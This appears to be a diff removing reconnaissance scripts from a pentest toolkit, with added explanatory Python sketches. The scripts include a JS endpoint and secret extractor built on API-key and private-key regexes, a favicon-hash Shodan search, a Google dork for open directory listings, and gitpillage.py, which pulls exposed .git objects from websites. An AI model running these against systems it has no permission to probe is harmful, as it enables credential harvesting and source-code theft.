    224  - 'amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', // Amazon MWS
    225  - 'AC[0-9a-fA-F]{32}', // Twilio client
    226  - 'SK[0-9a-fA-F]{32}', // Twilio secret
    227  - 'key-[0-9a-zA-Z]{32}', // MailGun
    228  - '[0-9a-f]{32}-us[0-9]{1,2}', // MailChimp
    229  - '[\'\"][A-Z0-9]{20}[\'\"]', // aws secret
    230  - '[\'\"][a-zA-Z0-9/]{40}[\'\"]', // aws api key
    231  - 'AKIA[0-9A-Z]{16}', // AWS client id
    232  - 'ASIA[0-9A-Z]{16}', // AWS client id
    233  - // '([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}', // AWS by TomNomNom
    234  - // '[0-9a-zA-Z/+]{40}', // AWS secret
    235  - // '[0-9a-zA-Z_]{5,31}', // Bitly client id
    236  - 'R_[0-9a-f]{32}', // Bitly secret
    237  - // '[0-9]{13,17}', // Facebook client
    238  - // '[0-9a-f]{32}', // Facebook secret
    239  - // '[0-9a-f]{32}', // flickr client
    240  - // '[0-9a-f]{16}', // flickr secret
    241  - // '[0-9A-Z]{48}', // foursquare client
    242  - // '[0-9A-Z]{48}', // foursquare secret
    243  - // '[0-9a-z]{12}', // LinkedIn client
    244  - // '[0-9a-zA-Z]{16}', // LinkedIn secret
    245  - // '[0-9a-zA-Z]{18,25}', // twitter client
    246  - // '[0-9a-zA-Z]{35,44}', // twitter secret
    247  -];
    248  -$_keywords_insensitive = [
    249  - //'auth',
    250  - //'private',
    251  - //'mysql',
    252  - //'dump',
    253  - //'login',
    254  - //'password',
    255  - //'credential',
    256  - //'oauth',
    257  - //'token',
    258  - 'access_token',
    259  - 'access_secret',
    260  - 'apikey',
    261  - 'api_key',
    262  - 'app_key',
    263  - 'client_secret',
    264  - 'consumer_secret',
    265  - 'customer_secret',
    266  - 'user_secret',
    267  - 'secret_key',
    268  - 'access_key',
    269  - 'fb_secret',
    270  - 'dbpasswd',
    271  - 'DB_PASSWORD',
    272  - 'DB_USERNAME',
    273  - 'JEKYLL_GITHUB_TOKEN',
    274  - 'oauth_token',
    275  - 'PT_TOKEN',
    276  - 'SF_USERNAME',
    277  - '-----BEGIN RSA PRIVATE KEY-----',
    278  - '-----BEGIN EC PRIVATE KEY-----',
    279  - '-----BEGIN PRIVATE KEY-----',
    280  - '-----BEGIN PGP PRIVATE KEY BLOCK-----',
    281  - '.apps.googleusercontent.com',
    282  - 'sq0atp',
    283  - 'sq0csp',
    284  - 'sk_live_',
    285  - 'rk_live_',
    286  - 'xoxb-',
    287  - //'secret',
    288  - 'gsecr',
    289  - //'username',
    290  - 'id_rsa',
    291  - 'id_dsa',
    292  - //'\.json',
    293  - //'\.xml',
    294  - //'\.yaml',
    295  - //'\.saml',
    296  - //'config',
    297  - '\.pem',
    298  - '\.ppk',
    299  - '\.sql',
    300  - //'\.conf',
    301  - //'\.ini',
    302  - //'\.php',
    303  - //'\.asp',
    304  - 's3\.amazonaws\.com',
    305  - 'storage\.googleapis\.com',
    306  - 'storage\.cloud\.google\.com',
    307  - '\.digitaloceanspaces\.com',
    308  -];
    309  -$_keywords_sensitive_regexp = '('.implode( '|', $_keywords_sensitive ).')';
    310  -$_keywords_insensitive_regexp = '('.implode( '|', $_keywords_insensitive ).')';
    311  - 
    312  -$_mode = MODE_ENDPOINT;
    313  -if( isset($t_options['k']) ) {
    314  - $_mode = MODE_KEYWORD;
    315  - $_regexp = array_merge( $_keywords_sensitive, $_keywords_insensitive );
    316  -}
    317  -elseif( isset($t_options['c']) ) {
    318  - $_mode = MODE_COMMENT;
    319  - $_regexp = array_merge( $_comment );
    320  -}
    321  - 
    322  -if( isset($t_options['g']) ) {
    323  - $g = $t_options['g'];
    324  - if( !is_file($g) ) {
    325  - usage( 'Regexp file not found' );
    326  - }
    327  - $_regexp = file( $g, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES );
    328  -}
    329  -if( isset($t_options['gg']) ) {
    330  - $_regexp = [ $t_options['gg'] ];
    331  - $_keywords_sensitive_regexp = $t_options['gg'];
    332  - $_comments_regexp = $_comment = $t_options['gg'];
    333  -}
    334  - 
    335  -$n_regexp = count( $_regexp );
    336  -if( $_verbose < 2 ) {
    337  - echo $n_regexp." regexp loaded.\n";
    338  - echo count($_t_source)." files loaded.\n\n";
    339  -}
    340  - 
    341  - 
    342  -foreach( $_t_source as $s )
    343  -{
    344  - $p = strrpos( $s, '.' );
    345  - if( $p !== false ) {
    346  - $ext = substr( $s, $p+1 );
    347  - if( in_array($ext,$_dontread) ) {
    348  - continue;
    349  - }
    350  - }
    351  - 
    352  - if( $_beautify ) {
    353  - ob_start();
    354  - system( 'js-beautify '.$s );
    355  - $buffer = ob_get_contents();
    356  - ob_end_clean();
    357  - if( $_beautify_alter ) {
    358  - file_put_contents( $s, $buffer );
    359  - }
    360  - } else {
    361  - $buffer = file_get_contents( $s );
    362  - }
    363  - 
    364  - ob_start();
    365  - 
    366  - if( $_mode == MODE_KEYWORD )
    367  - {
    368  - $ss = escapeshellcmd( $s );
    369  - $ss = str_replace( '\?', '?', $ss );
    370  - 
    371  - $output = null;
    372  - $cmd = 'egrep -n "'.$_keywords_sensitive_regexp.'" "'.$ss.'"';
    373  - echo $cmd."\n";
    374  - exec( $cmd, $output );
    375  - $n_sensitive = printColoredGrep( $_keywords_sensitive_regexp, implode("\n",$output), 1 );
    376  - 
    377  - if( $_keywords_insensitive_regexp != $_keywords_sensitive_regexp ) {
    378  - $output = null;
    379  - $cmd = 'egrep -i -n "'.$_keywords_insensitive_regexp.'" "'.$ss.'"';
    380  - exec( $cmd, $output );
    381  - $n_insensitive = printColoredGrep( $_keywords_insensitive_regexp, implode("\n",$output), 0 );
    382  - }
    383  - 
    384  - $n_total = $n_sensitive + ( isset($n_insensitive) ? $n_insensitive : 0 );
    385  - if( $_verbose < 2 ) {
    386  - echo $n_total." keywords found!\n";
    387  - }
    388  - }
    389  - elseif( $_mode == MODE_COMMENT )
    390  - {
    391  - $n_total = 0;
    392  - foreach( $_comment as $r ) {
    393  - $m = preg_match_all( $r, $buffer, $matches );
    394  - //var_dump( $matches );
    395  - if( $m ) {
    396  - $n_total += count( $matches[0] );
    397  - foreach( $matches[0] as $m ) {
    398  - echo preg_replace('#\s+#',' ',$m)."\n";
    399  - }
    400  - }
    401  - }
    402  - /*$output = null;
    403  - $cmd = 'egrep -n "'.$_comments_regexp.'" "'.$s.'"';
    404  - var_dump( $cmd );
    405  - exec( $cmd, $output );
    406  - $n_total = printColoredGrep( $_comments_regexp, implode("\n",$output), 1 );
    407  - echo $n_total." keywords found!\n";*/
    408  - if( $_verbose < 2 ) {
    409  - echo $n_total." comments found!\n";
    410  - }
    411  - }
    412  - else
    413  - {
    414  - list($t_final,$t_possible) = run( $buffer );
    415  - clean( $t_final );
    416  - $n_final = count($t_final);
    417  - $n_possible = count($t_possible);
    418  - 
    419  - if( $n_final ) {
    420  - $t_final = array_unique( $t_final );
    421  - $n_final = count( $t_final );
    422  - foreach( $t_final as $u ) {
    423  - echo $u;
    424  - if( $_test && stripos($u,'http')===0 ) {
    425  - $http_code = testUrl( $u, $_location );
    426  - if( $http_code == 200 ) {
    427  - $color = 'green';
    428  - } else {
    429  - $color = 'red';
    430  - }
    431  - $txt = ' ('.$http_code.')';
    432  - Utils::_print( $txt, $color );
    433  - }
    434  - echo "\n";
    435  - }
    436  - }
    437  - if( $_verbose < 2 ) {
    438  - echo $n_final." urls found!\n";
    439  - }
    440  - 
    441  - if( $n_possible && $_verbose<2 ) {
    442  - Utils::_println( str_repeat('-',100), 'light_grey' );
    443  - $t_possible = array_unique( $t_possible );
    444  - Utils::_println( implode( "\n",$t_possible), 'light_grey' );
    445  - Utils::_println( $n_possible." possible...", 'light_grey' );
    446  - }
    447  - 
    448  - $n_total = $n_possible + $n_final;
    449  - }
    450  - 
    451  - $buffer = ob_get_contents();
    452  - ob_end_clean();
    453  - 
    454  - if( $_verbose == 0 || $n_total ) {
    455  - if( $_verbose < 2 ) {
    456  - Utils::_println( "Loading: ".$s, 'yellow' );
    457  - }
    458  - echo $buffer;
    459  - if( $_verbose < 2 ) {
    460  - echo "\n";
    461  - }
    462  - }
    463  -}
    464  - 
    465  - 
    466  -function testUrl( $url, $follow_location )
    467  -{
    468  - $c = curl_init();
    469  - curl_setopt( $c, CURLOPT_URL, $url );
    470  - curl_setopt( $c, CURLOPT_CUSTOMREQUEST, 'HEAD' );
    471  - //curl_setopt( $c, CURLOPT_HEADER, true );
    472  - //curl_setopt( $c, CURLOPT_SSL_VERIFYPEER, false );
    473  - curl_setopt( $c, CURLOPT_NOBODY, true );
    474  - curl_setopt( $c, CURLOPT_CONNECTTIMEOUT, 3 );
    475  - curl_setopt( $c, CURLOPT_FOLLOWLOCATION, $follow_location );
    476  - curl_setopt( $c, CURLOPT_RETURNTRANSFER, true );
    477  - $r = curl_exec( $c );
    478  - 
    479  - $t_info = curl_getinfo( $c );
    480  - 
    481  - return $t_info['http_code'];
    482  -}
    483  - 
    484  - 
    485  -function printColoredGrep( $regexp, $str, $case_sensitive )
    486  -{
    487  - //$p = 0;
    488  - //$l = strlen( $str );
    489  - //$m = preg_match_all( '#'.$regexp.'#i', $str, $matches, PREG_OFFSET_CAPTURE );
    490  - //var_dump( $matches );
    491  - 
    492  - if( $case_sensitive ) {
    493  - $flag = '';
    494  - } else {
    495  - $flag = 'i';
    496  - }
    497  - 
    498  - $colored = preg_replace( '#'.$regexp.'#'.$flag, "\033[0;32m".'\\1'."\033[0m", $str, -1, $cnt );
    499  - if( $cnt ) {
    500  - echo $colored."\n";
    501  - }
    502  - //var_dump( $str );
    503  - //Utils::_print( '('.($line>=0?$line:'-').') ', 'yellow' );
    504  - /*
    505  - if( $m ) {
    506  - $n = count( $matches[0] );
    507  - //var_dump($n);
    508  - for( $i=0 ; $i<$n ; $i++ ) {
    509  - $s1 = substr( $str, $p, ($matches[0][$i][1]-$p) );
    510  - $s2 = substr( $str, $matches[0][$i][1], $l );
    511  - $p = $matches[0][$i][1] + $l;
    512  - //$p = $matches[$i][1] + $l;
    513  - Utils::_print( $s1, 'white' );
    514  - Utils::_print( $s2, 'light_green' );
    515  - //break;
    516  - }
    517  - }
    518  - 
    519  - $s3 = substr( $str, $p );
    520  - Utils::_print( $s3, 'white' );*/
    521  - return $cnt;
    522  -}
    523  - 
    524  - 
    525  -function run( $buffer )
    526  -{
    527  - global $_regexp, $_ignore, $_url_chars;
    528  - //var_dump( $_regexp );
    529  - 
    530  - $t_all = [];
    531  - 
    532  - foreach( $_regexp as $r ) {
    533  - $m = preg_match_all( $r.'i', $buffer, $matches );
    534  - //var_dump( $matches );
    535  - if( $m ) {
    536  - //var_dump( $matches );
    537  - $t_all = array_merge( $t_all, $matches[1] );
    538  - }
    539  - }
    540  - 
    541  - $t_exclude_extension = [ ];
    542  - $t_exclude_domain = [ ];
    543  - $t_exclude_scheme = [ 'javascript', 'mailto', 'data', 'about', 'file' ];
    544  - $t_exclude_string = [ ];
    545  - $t_exclude_possible = [ '+', '==', 'MM/DD/YYYY', 'text/plain', 'text/html', 'text/css', 'text/javascript', 'application/x-www-form-urlencoded', 'application/javascript', 'application/json', 'image/jpeg', 'image/gif', 'image/png', 'www.w3.org' ];
    546  - 
    547  - $t_possible = [];
    548  - $t_all = array_unique( $t_all );
    549  - //var_dump( $t_all );
    550  - 
    551  - foreach( $t_all as $k=>&$url )
    552  - {
    553  - //var_dump($url);
    554  - //$url = urldecode( $url );
    555  - 
    556  - $test = preg_replace( '#[^0-9a-zA-Z]#', '', $url );
    557  - if( $test == '' ) {
    558  - unset( $t_all[$k] );
    559  - continue;
    560  - }
    561  - 
    562  - $parse = parse_url( $url );
    563  - //var_dump($parse);
    564  - if( !$parse ) {
    565  - unset( $t_all[$k] );
    566  - $t_possible[] = $url;
    567  - continue;
    568  - }
    569  - 
    570  - foreach( $t_exclude_string as $s ) {
    571  - if( strstr($url,$s) ) {
    572  - unset( $t_all[$k] );
    573  - $t_possible[] = $url;
    574  - continue;
    575  - }
    576  - }
    577  - 
    578  - foreach( $t_exclude_possible as $s ) {
    579  - if( strstr($url,$s) ) {
    580  - unset( $t_all[$k] );
    581  - $t_possible[] = $url;
    582  - continue;
    583  - }
    584  - }
    585  - 
    586  - if( isset($parse['scheme']) && in_array($parse['scheme'],$t_exclude_scheme) ) {
    587  - unset( $t_all[$k] );
    588  - $t_possible[] = $url;
    589  - continue;
    590  - }
    591  - 
    592  - if( isset($parse['path']) && is_array($_ignore) && count($_ignore) ) {
    593  - $p = strrpos( $parse['path'], '.' );
    594  - if( $p !== false ) {
    595  - $ext = substr( $parse['path'], $p+1 );
    596  - if( in_array($ext,$_ignore) ) {
    597  - unset( $t_all[$k] );
    598  - continue;
    599  - }
    600  - }
    601  - }
    602  - 
    603  - if( $url[0] == '#' ) {
    604  - unset( $t_all[$k] );
    605  - $t_possible[] = $url;
    606  - continue;
    607  - }
    608  - 
    609  - if( isset($parse['path']) )
    610  - {
    611  - if( strstr($parse['path'],' ') !== false ) {
    612  - $tmp = explode( ' ', $parse['path'] );
    613  - $parse['path'] = $tmp[0];
    614  - }
    615  - 
    616  - $kk = preg_replace('|'.$_url_chars.'|i','',$parse['path']);
    617  - if( strlen($kk) != 0 ) {
    618  - unset( $t_all[$k] );
    619  - $t_possible[] = $url;
    620  - continue;
    621  - }
    622  - }
    623  - }
    624  - 
    625  - //var_dump($t_all);
    626  - return [$t_all,$t_possible];
    627  -}
    628  - 
    629  - 
    630  -function clean( &$t_urls )
    631  -{
    632  - global $_scheme, $_host, $_ignore;
    633  - 
    634  - $scheme = $host = '';
    635  - 
    636  - foreach( $t_urls as &$u )
    637  - {
    638  - //var_dump( $u );
    639  - $scheme = $host = '';
    640  - $parse = parse_url( $u );
    641  - //var_dump( $parse );
    642  - 
    643  - if( isset($parse['host']) ) {
    644  - $host = $parse['host'];
    645  - } elseif( $_host ) {
    646  - $host = $_host;
    647  - $u = ltrim( $u, '/' );
    648  - $u = $host . '/' . $u;
    649  - }
    650  - 
    651  - if( isset($parse['scheme']) && $parse['scheme'] != NULL ) {
    652  - $scheme = $parse['scheme'];
    653  - } elseif( $host ) {
    654  - $scheme = $_scheme;
    655  - $u = ltrim( $u, '/' );
    656  - $u = $scheme . '://' . $u;
    657  - }
    658  - 
    659  - if( strstr($u,' ') !== false ) {
    660  - $tmp = explode( ' ', $u );
    661  - $u = $tmp[0];
    662  - }
    663  - }
    664  -}
    665  - 
    666  - 
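The heart of the script above is the regexp battery applied to each source file. A minimal Python equivalent of the quoted-URL case — one simplified, hypothetical pattern standing in for the full list, not a port of it — looks like:

```python
import re

# one simplified pattern: a quoted absolute URL or absolute path
URL_RE = re.compile(r'''['"(]((?:https?://|/)[A-Za-z0-9._\-/?#&=:]+)['")]''')

def extract_endpoints(text):
    """Return unique endpoint candidates found in a source blob."""
    found = []
    for m in URL_RE.finditer(text):
        if m.group(1) not in found:
            found.append(m.group(1))
    return found

js = 'fetch("/api/v1/users"); $.get("https://example.com/x.php?id=1");'
print('\n'.join(extract_endpoints(js)))
```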
    favicon-hashtrick.py
    1  -#!/usr/bin/python3
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -# Reference: https://twitter.com/noneprivacy/status/1177629325266505728
    7  - 
    8  -import re
    9  -import sys
    10  -import requests
    11  -import base64
    12  -import mmh3
    13  -import argparse
    14  -from shodan import Shodan
    15  -from colored import fg, bg, attr
    16  - 
    17  - 
    18  -# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
    19  -from requests.packages.urllib3.exceptions import InsecureRequestWarning
    20  -requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    21  - 
    22  - 
    23  -def banner():
    24  - print("""
    25  - __ _ _ _ _ _ _
    26  - / _| __ ___ _(_) ___ ___ _ __ | |__ __ _ ___| |__ | |_ _ __(_) ___| | __ _ __ _ _
    27  -| |_ / _` \ \ / / |/ __/ _ \| '_ \ | '_ \ / _` / __| '_ \| __| '__| |/ __| |/ / | '_ \| | | |
    28  -| _| (_| |\ V /| | (_| (_) | | | | | | | | (_| \__ \ | | | |_| | | | (__| < _ | |_) | |_| |
    29  -|_| \__,_| \_/ |_|\___\___/|_| |_| |_| |_|\__,_|___/_| |_|\__|_| |_|\___|_|\_\ (_) | .__/ \__, |
    30  - |_| |___/
    31  - 
    32  - by @gwendallecoguic
    33  - 
    34  -""")
    35  - pass
    36  - 
    37  - 
    38  -def faviconHash( data, web ):
    39  - if web:
    40  - b64data = base64.encodebytes(data).decode()
    41  - else:
    42  - b64data = base64.encodebytes(data)
    43  - 
    45  - return mmh3.hash(b64data)
    46  - 
    47  - 
    48  -parser = argparse.ArgumentParser()
    49  -parser.add_argument( "-b","--favfile64",help="favicon source file (base64 format)" )
    50  -parser.add_argument( "-f","--favfile",help="favicon source file" )
    51  -parser.add_argument( "-u","--favurl",help="favicon source url" )
    52  -parser.add_argument( "-k","--shokey",help="Shodan API key" )
    53  -parser.add_argument( "-v","--values",help="values you want separated by comma, default: ip_str, can be: ip_str,http,data,domains,hash,ssl,timestamp,asn,_shodan,transport,os,isp,port,org,ip,tags,hostnames,location" )
    54  -parser.add_argument( "-s","--silent",help="silent mode, only results displayed", action="store_true" )
    55  - 
    57  -args = parser.parse_args()
    58  - 
    59  -if not args.silent:
    60  - banner()
    61  - 
    62  -if args.values:
    63  - t_values = args.values.split(',')
    64  -else:
    65  - t_values = ['ip_str']
    66  - 
    67  -if args.shokey:
    68  - shokey = args.shokey
    69  -else:
    70  - shokey = False
    71  - 
    72  -if args.favfile64:
    73  - favsource = args.favfile64
    74  - data = open(favsource).read()
    75  - data = data.replace( "\n", '' )
    76  - data = re.sub( 'data:.*;base64,', '', data )
    77  - data = base64.b64decode( data )
    78  - web_src = False
    79  - 
    80  -if args.favfile:
    81  - favsource = args.favfile
    82  - data = open(favsource,'rb').read()
    83  - web_src = False
    84  - 
    85  -if args.favurl:
    86  - favsource = args.favurl
    87  - try:
    88  - r = requests.get( favsource, timeout=3, verify=False )
    89  - except Exception as e:
    90  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    91  - exit()
    92  - data = r.content
    93  - web_src = True
    94  - 
    95  -if not args.favfile64 and not args.favfile and not args.favurl:
    96  - parser.error( 'missing favicon' )
    97  - 
    98  -if not args.silent:
    99  - sys.stdout.write( '%s[+] load favicon source: %s%s\n' % (fg('green'),favsource,attr(0)) )
    100  - sys.stdout.write( '[+] favicon size: %d\n' % len(data) )
    101  - 
    102  -if not len(data):
    103  - if not args.silent:
    104  - sys.stdout.write( '%s[-] invalid favicon%s\n' % (fg('red'),attr(0)) )
    105  - exit()
    106  - 
    107  -favhash = faviconHash( data, web_src )
    108  -if not args.silent:
    109  - sys.stdout.write( '%s[+] hash calculated: %s%s\n' % (fg('green'),str(favhash),attr(0)) )
    110  - 
    111  -if shokey:
    112  - shodan = Shodan( shokey )
    113  - search = 'http.favicon.hash:' + str(favhash)
    114  - if not args.silent:
    115  - sys.stdout.write( '[+] searching: %s\n' % search )
    116  - try:
    117  - t_results = shodan.search( search )
    118  - # print(t_results)
    119  - except Exception as e:
    120  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    121  - exit()
    122  - if not args.silent:
    123  - sys.stdout.write( '%s[+] %d results found%s\n' % (fg('green'),len(t_results['matches']),attr(0)) )
    124  - for result in t_results['matches']:
    125  - tmp = []
    126  - for v in t_values:
    127  - if v in result:
    128  - tmp.append( str(result[v]) )
    129  - else:
    130  - tmp.append( '' )
    131  - # print( tmp )
    132  - sys.stdout.write( "%s\n" % ' - '.join(tmp) )
    133  - 
    134  - 
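Shodan's `http.favicon.hash` is MurmurHash3 (x86, 32-bit, signed) of the base64-encoded icon, which is what `mmh3.hash()` computes above. If `mmh3` is unavailable, the same hash can be sketched in pure Python; this is an illustrative reimplementation, not code from the repo:

```python
import base64

def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 (x86, 32-bit), returned signed like mmh3.hash()."""
    c1, c2 = 0xcc9e2d51, 0x1b873593
    h = seed & 0xffffffff
    n = len(data)
    # body: 4-byte little-endian blocks
    for i in range(0, n - n % 4, 4):
        k = int.from_bytes(data[i:i + 4], 'little')
        k = (k * c1) & 0xffffffff
        k = ((k << 15) | (k >> 17)) & 0xffffffff
        k = (k * c2) & 0xffffffff
        h ^= k
        h = ((h << 13) | (h >> 19)) & 0xffffffff
        h = (h * 5 + 0xe6546b64) & 0xffffffff
    # tail: remaining 1-3 bytes
    tail = data[n - n % 4:]
    k = 0
    if len(tail) >= 3:
        k ^= tail[2] << 16
    if len(tail) >= 2:
        k ^= tail[1] << 8
    if len(tail) >= 1:
        k ^= tail[0]
        k = (k * c1) & 0xffffffff
        k = ((k << 15) | (k >> 17)) & 0xffffffff
        k = (k * c2) & 0xffffffff
        h ^= k
    # finalization mix
    h ^= n
    h ^= h >> 16
    h = (h * 0x85ebca6b) & 0xffffffff
    h ^= h >> 13
    h = (h * 0xc2b2ae35) & 0xffffffff
    h ^= h >> 16
    return h - 0x100000000 if h & 0x80000000 else h

def favicon_hash(favicon_bytes: bytes) -> int:
    # Shodan hashes the base64 form *with* the newlines encodebytes inserts
    return murmur3_32(base64.encodebytes(favicon_bytes))
```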
    filterurls.py
    1 1  #!/usr/bin/python3
    2 2   
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6 3  import os
    7 4  import sys
    8 5  import re
    skipped 459 lines
    finddl.sh
    1  -#!/bin/bash
    2  - 
    3  - 
    4  -NC='\033[0m'
    5  -BLACK='0;30'
    6  -RED='0;31'
    7  -GREEN='0;32'
    8  -ORANGE='0;33'
    9  -BLUE='0;34'
    10  -PURPLE='0;35'
    11  -CYAN='0;36'
    12  -LIGHT_GRAY='0;37'
    13  -DARK_GRAY='1;30'
    14  -LIGHT_RED='1;31'
    15  -LIGHT_GREEN='1;32'
    16  -YELLOW='1;33'
    17  -LIGHT_BLUE='1;34'
    18  -LIGHT_PURPLE='1;35'
    19  -LIGHT_CYAN='1;36'
    20  -WHITE='1;37'
    21  - 
    22  - 
    23  -function _print() {
    24  - if [ -n "$2" ] ; then
    25  - c=$2
    26  - else
    27  - c='WHITE'
    28  - fi
    29  - 
    30  - color="\033[${!c}m"
    31  - printf "${color}%s" "$1"
    32  - printf "${NC}"
    33  -}
    34  - 
    35  - 
    36  -function usage() {
    37  - echo "Usage: "$0" <domain file>"
    38  - if [ -n "$1" ] ; then
    39  - echo "Error: "$1"!"
    40  - fi
    41  - exit
    42  -}
    43  - 
    44  - 
    45  -if ! [ $# -eq 1 ] ; then
    46  - usage
    47  -fi
    48  - 
    49  -file=$1
    50  - 
    51  -if ! [ -f "$file" ] ; then
    52  - usage "File not found"
    53  -fi
    54  - 
    55  -method="GET"
    56  -user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1"
    57  -url="https://www.google.fr/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&q=intitle%3A%22index%20of%22%20site%3A"
    58  -#str="aucun document" # "no documents" marker on French Google
    59  -str="environ" # "about N results" marker on French Google
    60  - 
    61  -for d in $(cat $file) ; do
    62  - u=${url}${d}
    63  - #echo $u
    64  - cmd="curl -i -s -k -L -X $method -H \"$user_agent\" \"$u\" | grep -i \"$str\""
    65  - echo "$cmd"
    66  - #exit
    67  - go=$(eval "$cmd")
    68  - echo "$go"
    69  - if [ -n "$go" ] ; then
    70  - color="GREEN"
    71  - else
    72  - color="DARK_GRAY"
    73  - fi
    74  - _print $d $color
    75  - echo ""
    76  - #sleep 1
    77  -done
    78  - 
    79  -exit
    80  - 
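The script above URL-encodes an `intitle:"index of" site:<domain>` dork per domain. Building the same query string in Python (the Google host and the result-page marker strings above are whatever Google happens to serve, so treat them as assumptions):

```python
from urllib.parse import quote

def index_of_dork(domain: str) -> str:
    """Build the Google dork URL used to hunt for open directory listings."""
    q = quote(f'intitle:"index of" site:{domain}')
    return 'https://www.google.fr/search?q=' + q

print(index_of_dork('example.com'))
```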
    gg-extract-links.php
    1  -#!/usr/bin/php
    2  -<?php
    3  - 
    4  -function usage( $err=null ) {
    5  - echo 'Usage: '.$_SERVER['argv'][0]." <source file>\n";
    6  - if( $err ) {
    7  - echo 'Error: '.$err."\n";
    8  - }
    9  - exit();
    10  -}
    11  - 
    12  -if( $_SERVER['argc'] != 2 ) {
    13  - usage();
    14  -}
    15  - 
    16  -$src = $_SERVER['argv'][1];
    17  -if( !is_file($src) ) {
    18  - usage( 'cannot find source file!' );
    19  -}
    20  -$content = file_get_contents( $_SERVER['argv'][1] );
    21  -$content = urldecode( html_entity_decode($content) );
    22  -//var_dump( $content );
    23  - 
    24  -$t_links = [];
    25  - 
    26  -$doc = new DOMDocument();
    27  -$doc->preserveWhiteSpace = false;
    28  -@$doc->loadHTML( $content );
    29  - 
    30  -$xpath = new DOMXPath( $doc );
    31  -//$t_result = $xpath->query("//*[@class='r']/a");
    32  -$t_result = $xpath->query("//h3//a[@href]");
    33  -//var_dump( $t_result );
    34  -//exit();
    35  - 
    36  -foreach( $t_result as $r )
    37  -{
    38  - $lnk = $r->ownerDocument->saveHTML( $r );
    39  - preg_match_all( '#href="([^"]*)"#', $lnk, $tmp );
    40  - $full_url = str_ireplace( '/url?q=', '', $tmp[1][0] );
    41  - //var_dump( $full_url );
    42  - $t_info = parse_url( $full_url );
    43  - //var_dump( $t_info );
    44  - 
    45  - $t_links[] = $full_url;
    46  -
    47  - /*$a = preg_match( '#(.*)\.s3.amazonaws\.com#', $t_info['host'], $m );
    48  -
    49  - if( $a ) {
    50  - $t_buckets[] = $m[1];
    51  - } else {
    52  - $tmp = explode( '/', $t_info['path'] );
    53  - $t_buckets[] = $tmp[1];
    54  - }*/
    55  -}
    56  - 
    57  - 
    58  -echo implode( "\n", $t_links )."\n";
    59  - 
    60  -exit();
    61  - 
    62  -?>
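The same scrape — collect `href`s from result links and strip Google's `/url?q=` redirect prefix — sketched with Python's standard `html.parser` (the sample markup is illustrative, not a real results page):

```python
from html.parser import HTMLParser

class LinkExtractor(HTMLParser):
    """Collect href values from <a> tags, minus Google's /url?q= prefix."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            for name, value in attrs:
                if name == 'href' and value:
                    self.links.append(value.replace('/url?q=', '', 1))

parser = LinkExtractor()
parser.feed('<h3><a href="/url?q=https://example.com/page">result</a></h3>')
print('\n'.join(parser.links))
```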
    gitpillage.py
    1  -#!/usr/bin/python3
    2  - 
    3  - 
    4  -# inspired by https://github.com/koto/gitpillage/blob/master/gitpillage.sh
    5  -# example: python3 gitpillage.py -u https://www.example.com -t 10
    6  - 
    7  -# I don't believe in license.
    8  -# You can do whatever you want with this program.
    9  - 
    10  - 
    11  -#
    12  -### functions
    13  -#
    14  -def downloadFile( url ):
    15  - try:
    16  - r = requests.get( url, timeout=3, verify=False )
    17  - return r
    18  - except Exception as e:
    19  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    20  - return False
    21  - 
    22  - 
    23  -def downloadOject( t_extension, t_exclude, file ):
    24  - sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
    25  - t_multiproc['n_current'] = t_multiproc['n_current'] + 1
    26  - 
    27  - file = file.strip()
    28  - if not len(file):
    29  - return False
    30  - 
    31  - # 0: object_id , 1: real filename
    32  - tmp = file.split(':')
    33  - object_id = tmp[0]
    34  - real_filename = tmp[1]
    35  - ext = real_filename.split('.')[-1]
    36  - # print(ext)
    37  - 
    38  - # make the test easier to read/understand;
    39  - # default to True so 'go' is always defined even when
    40  - # both filter lists are empty
    41  - go = True
    42  - if len(t_extension):
    43  - go = ext in t_extension
    44  - if len(t_exclude) and ext in t_exclude:
    45  - go = False
    51  - if not go:
    52  - if t_multiproc['verbose']:
    53  - sys.stdout.write( "%s[*] skip extension: %s%s\n" % (fg('dark_gray'),real_filename,attr(0)) )
    54  - return False
    55  - 
    56  - u = git_url + '/objects/' + object_id[0:2] + '/' + object_id[2:]
    57  - # print(u)
    58  - r = downloadFile( u )
    59  - 
    60  - if type(r) is bool:
    61  - if t_multiproc['verbose']:
    62  - sys.stdout.write( "%s[-] %s%s\n" % (fg('dark_gray'),u,attr(0)) )
    63  - return False
    64  - 
    65  - if not r.status_code == 200:
    66  - if t_multiproc['verbose']:
    67  - sys.stdout.write( "%s[-] %s (%d)%s\n" % (fg('dark_gray'),u,r.status_code,attr(0)) )
    68  - return False
    69  - 
    70  - filename = saveObject( output_dir, object_id, r.content )
    71  - real_filename = output_dir + '/' + real_filename
    72  - 
    73  - try:
    74  - cmd = 'cd ' + output_dir + '; git checkout ' + tmp[1]
    75  - output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    76  - t_multiproc['n_success'] = t_multiproc['n_success'] + 1
    77  - display = "[+] %s (%d) %s-> %s (%d)%s\n" % (u,r.status_code,fg('cyan'),real_filename,len(r.content),attr(0))
    78  - except Exception as e:
    79  - if t_multiproc['verbose']:
    80  - display = "[-] %s (%d) %s-> %s%s\n" % (u,r.status_code,fg('yellow'),e,attr(0))
    81  - return False
    82  - 
    83  - sys.stdout.write( display )
    84  - 
    85  - 
    86  -def saveObject( output_dir, object_id, content ):
